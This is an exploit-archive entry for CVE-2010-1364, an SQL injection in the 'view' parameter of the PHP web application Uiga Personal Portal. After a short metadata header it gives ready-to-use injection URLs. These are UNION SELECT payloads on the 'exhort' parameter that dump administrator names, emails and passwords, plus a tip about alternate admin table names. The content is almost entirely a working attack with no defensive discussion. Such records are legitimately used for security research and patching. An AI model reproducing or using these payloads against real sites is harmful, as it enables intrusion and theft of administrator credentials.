Uiga Personal Portal - 'index.php' 'view' SQL Injection

Author: 41.w4r10r
type: webapps
platform: php
port: 
date_added: 2010-04-25 
date_updated:  
verified: 0 
codes: CVE-2010-1364;OSVDB-62628 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comuigapersonalportal.zip

# Exploit Title: Uiga Personal Portal index.php (view) SQL Injection
Vulnerability
# Date: 27-4-2010
# Author: 41.w4r10r
# Software Link :
http://www.scriptdevelopers.net/download/uigapersonalportal.zip
# Version: Web Application
# Tested on: Apcahe/Unix
# CVE : [if exists]
# Dork :
# Code :



Exploited Link :

http://[site]/uigaportal/index.php?view=ar_det&exhort=-36'

Examples :

http://[site]/product/demo/uigaportal/index.php?view=ar_det&exhort=-36+union+select+all+1,2,3,4,5,6,gr

oup_concat(admin_name,0x3a,admin_password),8,9,10,11+from+admin--

http://[site]/index.php?view=ar_det&exhort=-36+union+select+all+1,2,3,4,5,6,group_concat(admin_ema

il,0x3a,admin_password),8,9,10,11+from+tbl_admin--

Important: Sometimes the table name is administrators and sometimes its
admin